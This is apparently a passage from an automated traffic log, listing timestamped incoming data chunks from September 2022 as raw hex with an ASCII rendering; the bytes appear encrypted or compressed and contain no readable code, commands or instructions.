                                                                                            2022-09-02 09:02:34 UTC41INData Raw: 24 b9 f3 3d d4 1a 60 eb b9 33 77 bb c1 85 68 70 f4 74 f0 ac 79 64 91 03 7e fa 8f d4 77 6a d1 95 68 54 56 a5 9d 9f 2a e8 a1 0a 46 3b 9d 04 64 2b a7 64 af ea 87 43 ae e3 a8 60 bb fa 2f 6b a8 7c 67 3a 58 80 5a 02 77 26 32 65 30 c1 ec 9c 21 83 4c 05 47 6e 22 69 bd 3e 66 83 85 a9 ae 4a 87 3b 7b 69 51 42 f0 aa e6 fa c5 af 11 3c f7 0f f3 4b 3b 69 9d cd f5 25 8b 49 61 ec b7 3e a2 ad 21 4a 84 22 c7 00 60 2c d5 27 89 e8 4c 53 d3 21 a7 52 e6 94 ae 11 3d f9 6c 65 e6 90 4f fe cd 08 4f 82 1b de cf ea f7 b0 57 95 0d bd b5 d8 06 3b b8 f7 61 7e be 83 46 ab 6c 31 f7 e1 8f 97 91 02 a2 2f e7 ea cf b5 12 17 22 ef cb f9 8a d7
                                                                                            Data Ascii: $=`3whptyd~wjhTV*F;d+dC`/k|g:XZw&2e0!LGn"i>fJ;{iQB<K;i%Ia>!J"`,'LS!R=leOOW;a~Fl1/"
                                                                                            2022-09-02 09:02:35 UTC42INData Raw: 37 cf 2a 30 d5 fb 8c 29 1e a9 5b 41 f0 ae 67 4c 9a 02 d3 6f 4a 68 61 47 a6 e7 a5 ec 4f 8c 48 fd 78 c6 c1 08 50 22 02 f8 27 6f 4a fb ce 7d 2b 66 98 c3 a6 76 28 2d 6b 12 a4 28 c6 d2 af bc 65 9f a6 ad 42 49 c7 03 2f 91 50 21 e7 fc b8 a5 66 ad e7 15 cf f8 28 74 34 52 7f 89 35 fb 24 56 64 a7 19 69 df 15 4c 8f 22 ea 4f 72 5d 60 82 df 31 f8 43 18 4d 47 f2 fc 2a 66 52 88 97 ca 2c fc 3b 77 cb 9f a2 0d 13 d8 a6 0a d1 97 ab 61 4b 0b a1 6c c9 01 2e 68 5a 0e 43 9f a0 6a 2c cb 0a de 8c 06 02 d2 3a de fe f8 63 07 fd 82 4b 3c 06 66 21 77 90 80 e6 2b 9e 90 f5 6b 1e aa ff 1c 69 65 27 55 1d a0 e8 51 b9 08 55 99 9f c2 36 e1 6b 0d a3 af 45 d8 10 72 7e 3b 36 5c e5 29 e8 d6 87 9b 4b 14 a2 fc 8e a4 c5 fc 4d 10 37 4d 94 8d 7b ad fa 9c e4 fc 40 6c a4 10 c1 8e fb b4 ff 24 57 c9 8d
                                                                                            Data Ascii: 7*0)[AgLoJhaGOHxP"'oJ}+fv(-k(eBI/P!f(t4R5$VdiL"Or]`1CMG*fR,;waKl.hZCj,:cK<f!w+kie'UQU6kEr~;6\)KM7M{@l$W
                                                                                            2022-09-02 09:02:35 UTC43INData Raw: 1d 3f 56 7f 60 d1 da e9 23 9d 61 91 57 92 36 bd 26 98 81 bc a0 9d 64 c3 25 f9 e1 61 db 68 94 82 4d 32 71 65 cb 81 6e 2c a4 ea 62 bf 7a 2e 0a 6f b6 df a2 16 f4 c8 8f 6e f3 e3 d2 03 92 57 92 ff 2f 1a d2 f4 23 bd cb 2e dc 3f 6a a6 57 cb b7 19 4f 3b a4 e1 7e 57 bd fa 00 cf 02 58 6a a7 ea b2 00 60 aa 01 cb 84 49 60 ea e4 ad 64 2e 21 a8 2b 61 a4 2f 66 0a c7 ad e7 29 45 4d 70 b8 82 40 ce 0a ad 44 80 67 8f 4f 46 82 cb 89 30 1e c2 94 8e dc 86 0b e7 60 dd 7a 2e 64 34 1e c5 97 8e 35 ea 29 38 92 47 e7 9d c1 1b ca 87 4f 9c 52 e0 21 4d 8a 07 45 e9 a2 6d 9e 78 c2 65 18 f6 ea 82 e5 e2 ce c5 c6 8d 6c e8 eb f1 5b 83 a8 26 38 71 a8 26 2b 61 ec 18 bd 96 b0 a4 4a ca d7 dc 2e 80 c2 67 e3 8f d7 7f 57 5c f4 fa 0a ff 9e 65 39 53 c6 63 ee 28 e3 a2 ed 18 52 f0 c5 4d 8b 13 2a a3 7e
                                                                                            Data Ascii: ?V`#aW6&d%ahM2qen,bz.onW/#.?jWO;~WXj`I`d.!+a/f)EMp@DgOF0`z.d45)8GOR!MEmxel[&8q&+aJ.gW\e9Sc(RM*~
                                                                                            2022-09-02 09:02:35 UTC44INData Raw: dd 9a 2c 24 6c ea 06 39 dc e9 7f 3d 2a b6 d2 5a 3c 27 4a 83 d7 fc 8c e6 26 63 dd 1a ad 4a 5d 7a 9c 92 f7 80 be d3 94 83 75 5c 8b b3 55 dc 31 bb 70 e0 2e 54 14 a6 f2 51 8c 9b 97 55 5b e3 ea 7d 9e 80 1f e2 97 b8 74 af 52 90 55 51 71 b3 eb e1 e4 a4 f2 41 8c b2 60 26 25 9b 95 e1 6b cb f3 8a 1f 76 ad 44 fc 11 4f 92 97 fb a3 3b bb 8a eb d7 33 eb 2d fc 15 99 76 15 2d 0b 38 36 98 1e 5b 0d b4 b9 25 5f 84 39 96 e9 9c 86 d6 7f 07 ca f0 b7 79 33 20 ea 44 88 5d 29 15 69 d5 0d 3b a4 0a 81 06 0f b0 a2 3c 2d 6f 52 91 38 e7 76 72 43 5a 8f 84 e1 e5 f0 22 7c 8c 7a 35 d4 ff 2d 5c d2 b2 30 23 a2 62 f1 e8 3f b0 5c d1 30 8c 56 f9 21 22 e3 1d 54 ae a0 e0 e7 1d b0 f5 11 62 6f 58 e0 36 71 2d ff af b3 35 c9 a5 d9 47 d3 ef 1f 02 7b 04 fa f1 6f f6 30 a1 37 cd 96 eb a4 f6 7e 2c e1 2e
                                                                                            Data Ascii: ,$l9=*Z<'J&cJ]zu\U1p.TQU[}tRUQqA`&%kvDO;3-v-86[%_9y3 D])i;<-oR8vrCZ"|z5-\0#b?\0V!"TboX6q-5G{o07~,.
                                                                                            2022-09-02 09:02:35 UTC46INData Raw: 17 86 11 1c 0e 28 6a fa b5 ba 34 6d 4a 8f a6 a7 64 5e 75 43 91 17 a4 a2 26 e9 60 66 ae 02 c2 df 07 f2 8a ce a6 3e 9d 4e 6f 25 7d 11 cf db d4 dc 50 5f b4 80 93 65 91 25 ef 65 96 65 1b 7b df 11 b1 0a 07 36 5e 0a d1 58 50 40 3f 3e 3f 16 76 75 d0 25 e3 79 e3 7b e1 e6 2b 59 ff 6c 8f e0 e3 e2 df d4 10 5a 1d da dd 15 e5 69 a0 18 aa d8 e5 ae ef e2 a8 ab e9 61 c3 03 61 67 23 4e 87 10 9b 3f 7d 2a 52 5d 3c 31 94 d9 6c 28 63 5a fb ce 26 61 e0 8a c2 a3 6e 2a e3 9d 6f 5e a7 2f 70 1b cb 25 3b a3 d5 5b 3e c8 ce f4 93 c7 5d 0a be 2c 66 ef ae f4 6b 61 a9 1c 88 7c 3b 5c 6c d6 e6 54 3d 00 2e f1 a8 1e 50 b7 ad f5 cb 12 aa 62 63 12 6d 2d f3 0b 7e 0f d6 18 e0 22 72 bd 63 58 3b e6 1b c0 3d 1a 87 f7 85 11 6e fa fb 33 6f d8 0b 28 fa 03 59 30 7b 21 aa f7 d1 31 28 98 6b 25 7b f6 05
                                                                                            Data Ascii: (j4mJd^uC&`f>No%}P_e%ee{6^XP@?>?vu%y{+YlZiaag#N?}*R]<1l(cZ&an*o^/p%;[>],fka|;\lT=.Pbcm-~"rcX;=n3o(Y0{!1(k%{
                                                                                            2022-09-02 09:02:35 UTC47INData Raw: 86 9a 53 f8 36 ab ef 07 40 5c 95 8a 40 fd 36 82 c1 46 d7 97 ca 95 1b 6a f1 d5 6f 83 6c 58 1a 23 e6 0b 93 b9 a7 97 d0 81 c4 7e 9d 59 44 20 73 0d d1 40 2e f7 e6 e0 4c c5 b6 b3 9d 82 bb 28 fe 76 65 c9 59 3f fe 39 a7 e7 f8 b8 f7 b7 af 1b 72 0b e6 3b a4 c6 ed 4e 32 91 4d 4d 15 3a 5f c9 19 be 19 85 09 f1 0f 66 06 e9 c2 03 b7 f1 32 73 af e7 16 d3 fa 12 05 6f ab 84 44 4f 80 2d b4 e9 51 4b 97 08 d9 12 f4 69 2a f5 bb 80 76 3b 3c 20 23 5f 5c 80 03 ee 26 de 71 55 bd 9a 29 b7 1d ac 49 41 62 a5 52 48 b9 41 f4 2d 3f e3 94 0d 1f f9 7d cc a0 42 1d f7 8b 4d f5 6c a0 d5 48 83 81 72 5a b5 57 08 ef f7 a3 ce 82 74 bb 5a 52 f5
                                                                                            Data Ascii: S6@\@6FjolX#~YD s@.L(veY?9r;N2MM:_f2soDO-QKi*v;< #_\&qU)IAbRHA-?}BMlHrZWtZR
                                                                                            2022-09-02 09:02:35 UTC47INData Raw: e1 67 80 3f c3 67 b7 46 72 aa 93 0f 93 0f ca 9f 19 c8 23 7b 32 08 43 9a 52 b0 79 fc c5 50 ab 24 0d 4e 61 37 be e6 a9 51 dc 92 fb bd c6 6b c9 f2 f3 ab 1a dd ff 3e 44 85 a9 04 ee ac 48 af 09 18 97 24 16 16 78 6b ca 94 31 d9 81 54 57 65 3f 9b 23 fd 23 31 cd df dd d3 13 eb 24 aa fb 75 dc 95 d7 76 33 b5 a3 cb e2 b3 bf db dc ad f9 fc 8b 9d 18 d0 e0 f5 69 96 1f e2 67 ec 73 c8 33 c8 61 1f 25 62 a7 53 61 5c d9 c2 10 fb 61 21 5c b8 03 ac 49 70 3a 6b cd 99 a5 51 6f 4e 83 47 eb 09 c0 5a 42 dc f9 02 97 18 e5 5a d8 25 97 e6 fe 8f 97 f3 0e 5a 01 fc 97 d9 24 5a 57 af 12 b9 7f 38 28 6b 4f c5 57 a9 8c a5 63 f5 fb 74 f4 94 90 d1 48 4c 6e 80 5e b6 e0 90 5c 18 a3 e9 cb 84 d3 ef a1 d9 ea 72 b6 1f dd 0c ee 6d d2 d1 7f 5b c4 07 a0 3d a6 bf ef f2 a1 0b 59 ac e3 93 bd c7 fb 38 57
                                                                                            Data Ascii: g?gFr#{2CRyP$Na7Qk>DH$xk1TWe?##1$uv3igs3a%bSa\a!\Ip:kQoNGZBZ%Z$ZW8(kOWctHLn^\rm[=Y8W
                                                                                            2022-09-02 09:02:35 UTC49INData Raw: c3 26 a1 ec 21 6c 8e 43 02 89 c9 43 40 4c 86 43 e9 ed 26 67 db 08 89 40 6c 7d 69 ae cf c2 3c d4 0f 7c b0 da eb d0 39 fa 10 2c 5a e2 0b d7 3a 6a a0 e1 3d a1 d2 1d 7a 6d ec 85 11 b2 26 d1 52 e9 52 88 32 e8 29 12 f2 c3 ee 06 c0 65 27 e3 40 f2 05 a1 d4 6e 89 6b ae cf f2 3c ad c5 30 a6 74 85 ca 85 08 24 3c 7a 94 da e9 e2 4c 7d 83 fc b8 35 aa cc 81 7b 36 cd 76 31 d5 b9 af e7 c6 59 fc 88 ba 4d ff 67 4b 46 e9 c6 c6 e9 e9 97 99 39 7c 85 e0 52 2e f7 6b af 6e 13 f7 cb b1 11 b9 50 8c 16 b6 d2 1d 63 db 70 41 5d 41 99 86 5e 51 89 81 e3 a3 53 1b 26 e3 5e b7 8f 62 a7 41 4b 6c 86 88 8e b1 58 61 26 90 78 f1 74 24 35 5e a7 4a 02 10 57 eb 5b 98 26 e0 19 6d 75 4b 05 04 5e 3e 07 2b 95 9a e7 e9 ef e9 6f d5 5e 6f e7 27 29 e9 5f 9a d8 44 75 a4 1e 64 45 75 b8 f2 97 72 0f 6d 1f 9e
                                                                                            Data Ascii: &!lCC@LC&g@l}i<|9,Z:j=zm&RR2)e'@nk<0t$<zL}5{6v1YMgKF9|R.knPcpA]A^QS&^bAKlXa&xt$5^JW[&muK^>+o^o')_DudEurm
                                                                                            2022-09-02 09:02:35 UTC53INData Raw: 90 fd 1f 13 f6 a9 c7 08 c6 7a a7 0b bf a3 65 54 dc de 63 de e3 af 5a 33 31 93 6d 98 7b b8 68 ed 13 3c 40 db 83 1c f7 da 15 c9 05 e3 a1 f6 bd 32 79 e4 b5 7f f2 30 a3 75 f7 22 a0 74 9e 06 ec 67 25 ea bf f3 26 78 3e 61 67 02 06 a7 ec 47 0e d3 a2 3c
                                                                                            Data Ascii: zeTcZ31m{h<@2y0u"tg%&x>agG<
                                                                                            2022-09-02 09:02:35 UTC53INData Raw: 56 fa 81 cf e3 87 a4 45 50 98 a7 a9 a0 fe a4 d2 b6 39 0f 2b 64 fc 0e 05 73 9d 75 bb 5f d2 03 2b e2 49 95 3b 20 b5 41 43 73 7a d0 1f d6 4e 6e a6 ed b0 6e e3 2a f1 e6 af b1 6c 94 5c 34 c9 97 e7 b1 46 08 83 ef d7 d6 0f 40 93 c6 bb 1d 79 94 f7 1a df 12 e6 14 e1 13 da 1e 33 d7 c5 55 17 84 42 a9 9c 5b 70 bc f5 35 6f bc 25 1f 88 52 b6 87 4f a4 cd 26 fa 1b c4 25 4e 83 5a 95 4a 85 0d 14 14 1c 6a 38 62 00 49 e6 3e 8f 88 3e 38 82 71 8f 1a e0 7f 85 cd 26 4c 80 64 a9 c5 b9 1e 1e 72 6c 83 92 7f 6e c0 84 34 78 28 4a cf 4c 09 2b e3 e9 67 13 c1 76 91 f3 77 09 fe fd 3e a8 e8 45 f0 a2 6a b3 84 1a 93 d7 65 f3 42 b5 c5 ed ce bb 98 ca ed 43 b1 72 20 b3 eb 0c d4 e3 7e 24 07 8c fe 23 c1 43 20 83 97 9a 0e 03 a1 e1 89 4d 8e 18 14 e7 db c1 fe 59 fc e4 9a fd fb 07 99 27 e3 5d 05 6b
                                                                                            Data Ascii: VEP9+dsu_+I; ACszNnn*l\4F@y3UB[p5o%RO&%NZJj8bI>>8q&Ldrln4x(JL+gvw>EjeBCr ~$#C MY']k
                                                                                            2022-09-02 09:02:35 UTC57INData Raw: 2f 67 1e db ef 66 02 9b 23 a5 6d 0c 45 f7 8c d5 7e b0 69 b2 7c e0 1b 06 b0 c9 a1 4d 2b f2 e2 7a 1a 97 4e c6 bb 10 29 d3 2d 08 ed da 71 ad 2f 6d c2 81 f3 d4 ed cd 6f c7 0a 2c 65 07 ca e3 ac 61 84 fb 58 e9 24 b7 c5 ec fa c1 22 88 8f 80 73 a6 1e b0 d2 c2 71 fd 7c 71 e6 bb c5 8e 37 d4 56 53 9a 65 16 da a8 64 69 d6 df 60 69 93 9a 60 e9 a7 bb 76 6b 74 19 78 43 fc db 98 69 aa 64 25 60 2d 6c dc 32 9f fd 70 12 83 7a b4 ae eb 9d ff 42 a8 69 67 29 e3 8f d6 3a 5c 6d 5c 7b a6 7e 95 63 5b de c4 10 0d e8 b2 6e 0b 80 b2 2a e4 eb 54 3d 91 3b ef e1 7f 34 bc f5 26 2b 6e 4b 4b 31 bc ae 66 57 5b ab ae e0 01 06 6c 2e 6c 26 ff 76 e6 2f 88 45 a5 38 b7 2e f3 6a 7a e3 bc 25 ab de c4 22 e8 64 2d 23 c6 0d a5 0f 0a 53 6c 17 6d a9 28 ec cd 81 28 3e 7b e2 78 fa 52 5c 0d c3 98 d4 39 fe
                                                                                            Data Ascii: /gf#mE~i|M+zN)-q/mo,eaX$"sq|q7VSedi`i`vktxCid%`-l2pzBig):\m\{~c[n*T=;4&+nKK1fW[l.l&v/E8.jz%"d-#Slm((>{xR\9
                                                                                            2022-09-02 09:02:35 UTC61INData Raw: 92 90 d4 60 02 7f a7 9d b2 87 38 3b 91 44 1e 01 64 f3 1e f2 47 fb c6 62 44 69 f7 e5 a3 79 e1 93 2d c3 99 8e a0 99 50 ec 59 1f 50 e0 d3 24 a8 7d c3 99 a0 e8 16 bf 80 3f b4 a7 67 c7 80 e8 12 5a 61 6c b6 0b 9d c0 af fd 98 2c cb 02 f6 25 53 9c 89 5e e3 28 d6 11 68 eb f1 6b b7 69 26 2d 6b 12 df e9 61 d3 53 e9 dd 9b dc 04 31 a4 12 9a 24 29 66 1f c9 73 64 fa f7 e7 6f cf 17 6c 19 86 c8 05 a2 6b 66 aa 62 a2 40 84 29 f1 f2 cf ce e5 b1 78 2c ad fd 79 70 b0 fd 36 3b 7e a8 27 3f 6f 14 6e 36 e2 6c 76 7a 84 e1 3c ad 23 ee 5c 88 12 95 07 80 54 ba 49 ba 35 fe 50 86 f0 af 32 7b 7e 3f e4 49 d3 86 10 68 87 9d 68 73 a8 f6 d5 12 a7 37 48 94 c6 4b 3e f5 57 dc 5a 83 0a d3 a8 64 8e 22 1e 23 af f2 bd 24 cf 47 82 b5 90 a6 cb 6d 01 f5 d1 46 31 f1 66 4f 84 89 c1 e2 f4 1f e6 93 3b 2d
                                                                                            Data Ascii: `8;DdGbDiy-PYP$}?gZal,%S^(hki&-kaS1$)fsdolkfb@)x,yp6;~'?on6lvz<#\TI5P2{~?Ihhs7HK>WZd"#$GmF1fO;-
                                                                                            2022-09-02 09:02:35 UTC62INData Raw: 4c 28 24 f4 df 8a f7 8f 12 82 e4 35 ac a5 68 18 6f 83 bb 43 3f 1c b8 6a e7 a2 43 7e 07 f1 b8 ce f9 5b ed d8 e1 29 64 1f a2 d8 f2 6c 1f 52 05 39 87 cb 1f fb 9b 7f c7 a9 29 62 0d 14 f6 6c 01 0b 65 62 0c bf b2 ab 9e 0f 40 cb 9c 15 a7 c5 7a 62 be 0b 58 08 c5 fc 32 0b 91 54 53 16 43 7e bf 9d ed 7f 07 0a 38 80 ca 52 e6 6e 8e c3 e2 13 1f 6b a7 6a e7 25 ec df a9 80 ce 16 f3 bb 32 8c 25 0b 39 e3 41 d0 72 ac ea 96 68 94 82 32 f9 84 a7 7a 3c 04 1f f4 65 71 7d 99 59 8f d1 dc d0 f1 83 86 62 63 f2 b4 2c 86 ca 07 27 04 a5 6a 06 cb af 22 e2 7f 84 9c eb a6 82 f6 08 b2 f5 74 62 20 ef 34 f9 ea 71 b1 7f 93 cc 28 ba f2 db 14 a1 6e a9 dd 6a ee 53 7e 5f 02 8f 31 ab 6a d5 a2 4e c6 0f d0 11 ce b0 15 a7 02 38 a5 08 80 fe 12 d7 2f 3c f1 8f 70 62 9f 66 fe f1 3a 1f 4f 1b 1a a6 e9 e0
                                                                                            Data Ascii: L($5hoC?jC~[)dlR9)bleb@zbX2TSC~8Rnkj%2%9Arh2z<eq}Ybc,'j"tb 4q(njS~_1jN8/<pbf:O
                                                                                            2022-09-02 09:02:35 UTC64INData Raw: b4 63 5d 8a 42 f2 3a 63 a7 94 5e d9 c3 b2 4a 86 c7 2e 52 b7 b3 79 d4 23 1e e8 f5 c5 8f 30 af 53 74 86 22 1d d4 98 57 0e c7 9e 37 11 dc 07 42 6c 8f ee a2 2d aa 66 a7 94 8a b6 c2 05 d2 1a ad 08 ca 9a 53 9c a3 93 bc 0e 80 51 41 a4 35 be e3 2e c3 38 d6 43 8b 32 ba cb 28 2f cd e7 af 9c d7 7c 93 5a 33 2f 77 73 6a be c2 36 03 72 a3 fa 82 c3 a7 06 4f 8b 27 92 07 b1 5a 4f 72 8e e0 23 be eb 13 66 9f 6d 4b 20 03 3a f4 87 4d 3b b1 2d bd e0 c7 44 4c 49 44 aa d8 a7 49 40 14 a8 b7 ad 4a 67 e1 b7 59 17 8f 14 3e ea f4 5c 8a e5 30 ba 27 3d e7 3a a7 ac 61 6d a0 e9 5a 00 a3 09 c1 7f 2c a7 f1 f9 e4 ab d2 09 f0 7a a1 6b 18 fd 82 b2 0b af cc e0 26 e7 28 e4 67 ab d0 19 a4 8b 46 e2 69 3d 3c a7 f5 f7 1e 1d f4 b9 26 3e b1 1f d5 ae 26 6d b4 3c d1 15 21 e7 67 6c 61 ab 60 35 a6 69 38
                                                                                            Data Ascii: c]B:c^J.Ry#0St"W7Bl-fSQA5.8C2(/|Z3/wsj6rO'ZOr#fmK :M;-DLIDI@JgY>\0'=:amZ,zk&(gFi=<&>&m<!gla`5i8
                                                                                            2022-09-02 09:02:35 UTC68INData Raw: 7b dc aa 5a b7 7a 2e ae 16 13 dd e0 80 bd 02 bc 24 51 48 8b e6 73 aa 3b e2 6b a2 ea e2 df c6 fb f0 cd 52 fa 5f 74 a7 63 a7 36 05 7c b2 e1 2c 7f e2 68 4e 37 b2 9f b3 6a 5f 5d 86 94 c9 fc dc 2d a7 a6 26 e1 e1 a5 de 11 2c 3d f2 23 ee 62 2a 19 5e e1 93 da a7 6b a6 ce 69 40 8d 00 cf 02 97 d8 25 6a 0a 2f c6 be 12 1b 3e b8 60 7a 1f 27 56 b8 84 9a 65 23 69 d3 5a 6b a2 05 cb 3a a6 fa 25 c3 6a cb 3d 70 4f 26 f7 9e 8a 9f fc a9 23 92 1e 34 09 0e 36 ab eb 67 2c a4 12 11 79 cb 0c 6b eb 23 fd 0e 63 83 6d a6 9d 14 26 e5 ae 4f 0e ef 6a d6 e7 37 47 e3 26 a2 10 80 22 bb e2 7e 3c 69 1a 3f 84 a9 25 90 37 b6 13 63 0e 9d 0f 43 19 ce ea e8 07 48 3f 23 08 43 fa 29 6d 76 30 e0 b8 b6 67 1e dd e1 eb d7 d9 33 0b 85 67 ea 08 80 b3 4e dd 6b ca 01 3f 99 46 ba 97 df b7 e5 3e 7c 14 95 7c
                                                                                            Data Ascii: {Zz.$QHs;kR_tc6|,hN7j_]-&,=#b*^ki@%j/>`z'Ve#iZk:%j=pO&#46g,yk#cm&Oj7G&"~<i?%7cCH?#C)mv0g3gNk?F>||
                                                                                            2022-09-02 09:02:35 UTC69INData Raw: 16 ce 92 4b 55 b0 09 b0 00 85 41 b0 d8 84 32 b6 77 39 a8 1a 61 d2 c0 9f 4a 35 dd 7a 8b 7e eb ab 08 dd 73 2a f0 6d 4f 23 54 e9 cf 96 42 ee b2 21 82 94 5e e8 d4 11 24 93 5f 1d f1 c0 3a 34 de 5a b3 47 1d 00 4f 1f df ec 0d 0e da 52 96 5e 12 db d2 eb fa 77 13 e1 eb 8d 8e 3c e9 72 f9 24 b7 76 40 90 cf f0 55 31 44 b0 37 1b f5 fb 07 83 18 74 0f 37 5e b5 dd 17 c4 4d d3 26 bd 02 d4 6f c8 14 89 af d8 2e 28 0f d6 7c fe b2 4c 16 a7 f0 77 b2 49 80 4b 11 a3 53 ce 39 a8 1f 4f ab b7 04 c1 31 ec ea ea ec 7a 3a 31 d9 73 c9 fb 0a 11 eb 27 1d c4 9a 5c e2 c8 96 a3 f5 ed fd 21 bd e5 c3 c2 f3 c2 e3 d2 96 f3 0f e1 e1 1e 09 04 c1 4d 81 97 03 c5 4c 88 f2 74 c9 69 76 d5 e8 b5 e3 6e 23 9d 11 af c9 b9 30 00 f5 f8 4f a2 26 b3 32 f6 e0 f4 3b 2e 1f 22 19 df 90 a9 e7 0e 4e d8 1b c6 96 5b
                                                                                            Data Ascii: KUA2w9aJ5z~s*mO#TB!^$_:4ZGOR^w<r$v@U1D7t7^M&o.(|LwIKS9O1z:1s'\!MLtivn#0O&2;."N[
                                                                                            2022-09-02 09:02:35 UTC74INData Raw: fb a7 25 a6 36 85 ef 28 d1 b7 cf d4 e9 c5 4e 94 5a cc ba ae 64 49 0f 93 95 83 63 ef 87 ec 6d a9 69 da b2 0e 33 7e a7 c7 66 a3 ae 6c c8 29 bd bf ad 25 34 7c 1e 1c 2e 2a ef e4 82 df 32 22 64 74 fa 64 3f a1 d2 5d 3d 62 a7 4b 0a 6f e0 e0 a2 cf 03 19 f2 ec 02 cc 04 ef 4a cf 68 88 28 ca 74 a2 3d ec 82 47 7e 53 8a bf f8 6d aa 03 c6 6c 01 49 af 3d b3 ae 12 16 65 a1 60 6c 82 0e a3 cb 87 e2 1e c7 f3 ad a5 8b 0b e4 22 49 87 cd 00 48 85 5b 2f 72 18 c0 32 02 9c d4 4e e3 02 a7 38 78 63 07 da 7a c3 30 a4 56 a2 27 99 f1 af 63 3a 53 2f e6 7e b8 75 33 ca 13 bb e6 68 cf 5e 74 54 fc 42 0b 09 e0 33 35 b1 9f 0f c8 00 a6 68 0c 77 12 69 f2 1c 85 00 ef 48 44 8a 1a 36 46 6e 62 ab de d2 66 0d 4a 65 07 82 4a 8b 66 0d 48 60 ac 22 66 83 3b 1e 8b 47 a6 e1 68 0a a3 c7 26 f5 72 ac 35 38
                                                                                            Data Ascii: %6(NZdIcmi3~fl)%4|.*2"dtd?]=bKoJh(t=G~SmlI=e`l"IH[/r2N8xcz0V'c:S/~u3h^tTB35hwiHD6FnbfJeJfH`"f;Gh&r58
                                                                                            2022-09-02 09:02:35 UTC78INData Raw: b4 79 7d a5 e1 72 54 82 2f 94 2a 19 7a 3c ab 55 5d 26 f0 33 ee a7 28 a5 29 20 62 34 b4 a8 d6 db a6 59 54 2f f0 b7 e7 f5 fa a3 e7 7f e6 38 2e a2 ec f2 1b 4d a4 eb 5e 1e 33 fa 2e a5 e9 89 4a 7d 12 ca 27 eb 2b 90 d0 91 5b f8 f6 80 04 90 dc 72 bc ea d5 93 ac 61 2c b7 e9 59 4e 93 5d a4 a8 26 13 17 dd eb ca 2e 0f b5 f2 17 fd d0 c8 bc 9f 4e 16 96 24 2d 6f 67 d8 0c be 16 da 62 84 8e e1 ae 16 13 eb 5b 50 ea 26 e4 6b 96 07 6a c9 d4 7e 01 c7 79 56 8f e3 68 a2 b7 f5 74 25 25 51 b7 8d 36 a2 f8 2c 3d 53 e6 c0 b9 77 aa 69 50 18 92 c4 f7 6c 39 70 a6 9a 9d 6d 9c 9f a5 21 fc 7f a7 ea be 3a 23 73 f7 de 11 22 a4 a0 3a 3e a4 f4 f7 69 bc 38 19 da 96 d0 96 dc 55 54 21 7b 3d b7 ff d4 17 e2 ab e7 ed 6f 69 6e 25 d4 15 61 31 bc 65 e8 d5 dc 26 ed eb 99 d1 ba b1 f0 51 8c a1 97 1c a9
                                                                                            Data Ascii: y}rT/*z<U]&3() b4YT/8.M^3.J}'+[ra,YN]&.N$-ogb[P&kj~yVht%%Q6,=SwiPl9pm!:#s":>i8UT!{=oin%a1e&Q
                                                                                            2022-09-02 09:02:35 UTC82INData Raw: 78 11 88 dc 1d 90 97 62 63 f2 b4 c0 d0 f1 3d c3 a6 d3 10 6f 2e d6 66 d3 40 93 30 68 e3 f1 b5 d2 96 d1 d9 18 65 17 d6 2c 07 4e 57 ca b1 69 27 15 d1 3c 49 1f fc 56 0c 24 d1 9d 67 ed e5 3c 6b f2 6d 82 5d b7 4d 05 2f 68 e1 9e d4 a4 4c 80 88 55 84 4d bb 26 2b a3 7a 8a 64 b3 4d a7 65 2c e8 06 cd b2 7f 89 83 3f 6b a4 f5 69 6e af 76 98 49 b8 01 ad 7e ee 08 6a a6 93 75 0b eb ad 27 c7 61 dd 7a 60 eb b1 3b a2 91 4d 93 4b 2a e3 7e 3c e7 2a 2f 96 95 f7 46 58 11 5d 1d cd 8a 58 7f 2e b5 e0 7e 32 2f de d7 64 a9 23 d0 d9 ef 36 c5 4d b5 9d 9a e5 a3 a8 d5 f6 00 26 eb a5 3f ba 0c 88 02 b9 16 fd 4d d7 6e 3c fc ac d3 19 46 0f f7 d7 07 e2 2a 27 0a af 82 3a 09 a6 9f 3b ec b1 ec b8 f5 24 05 53 d3 0e 22 e2 7f b7 59 51 26 6b d3 08 b2 31 77 27 ab e2 7e e1 6b 7b 9c da 62 50 46 ff d6
                                                                                            Data Ascii: xbc=o.f@0he,NWi'<IV$g<km]M/hLUM&+zdMe,?kinvI~ju'az`;MK*~<*/FX]X.~2/d#6M&?Mn<F*':;$S"YQ&k1w'~k{bPF
                                                                                            2022-09-02 09:02:35 UTC86INData Raw: 57 e1 e6 8f 8d 96 71 0f 32 aa c3 13 ca 18 3e 2f 21 72 1f 5f 7a 68 2e 19 1e 28 0e 41 65 2a a5 1f ff cd 69 fb 93 b8 9f 6b ac 47 d5 35 ac ea d4 79 56 09 da 44 be a6 18 00 ac 5a f1 07 6d 78 21 4b f2 6f a0 39 f5 b1 2b 3d 5d cc fb 79 bc 00 cd 3b fe 57 c9 39 84 3e eb d9 90 93 0a 55 6a 81 58 c0 19 d0 03 79 40 96 eb 6c f5 f5 eb f2 a6 57 a1 9f ad 96 03 bf 73 c9 c3 be 65 35 16 06
                                                                                            Data Ascii: Wq2>/!r_zh.(Ae*ikG5yVDZmx!Ko9+=]y;W9>UjXy@lWse5
                                                                                            2022-09-02 09:02:35 UTC86INData Raw: 36 f2 2e 3a 0f fb ba 0f b5 60 93 c1 3d 6f f9 dd 4f b2 5f b2 79 df 6c 3e f3 2f bb ce 44 03 e5 da 07 49 c2 58 ae 33 e0 ac d3 d6 f2 97 32 5b 03 e4 26 fc de ac 27 ca 38 70 af 31 db 46 93 7e 87 37 9c 5e ae d6 26 8b 42 53 95 27 a6 2d e1 6e f1 1f d7 99 0e 73 e0 be 9a 50 13 49 b4 65 2d 8d 69 d6 b3 e5 31 57 f7 07 3a 90 ab bc 2b b9 2e 40 04 75 0e f0 65 61 b1 18 90 03 86 39 9c 88 3a f7 e2 16 42 9c 07 f9 b9 06 45 09 87 1c fd 46 d5 6e 85 9b 59 43 54 8a 15 da a4 15 a2 71 24 2a db 6a 2c 26 0f e1 ae a9 02 19 d4 8c 6a a1 67 fd 34 38 57 bb f3 42 f4 a3 61 70 f1 bd 49 1f 52 90 5a b4 6c 8a 5b c3 97 93 e6 74 24 0a 8f 23 f2 70 ad 1b e9 5a b7 f1 82 cb a7 22 6c 52 9c 48 0b ea d0 73 47 e7 68 9b 55 3e e4 c3 4d f3 0b c6 a0 25 d8 b9 5f fb 9d ea 70 56 f7 fa 0f 42 f0 29 2a 60 25 6a 61
                                                                                            Data Ascii: 6.:`=oO_yl>/DIX32[&'8p1F~7^&BS'-nsPIe-i1W:+.@uea9:BEFnYCTq$*j,&jg48WBapIRZl[t$#pZ"lRHsGhU>M%_pVB)*`%ja
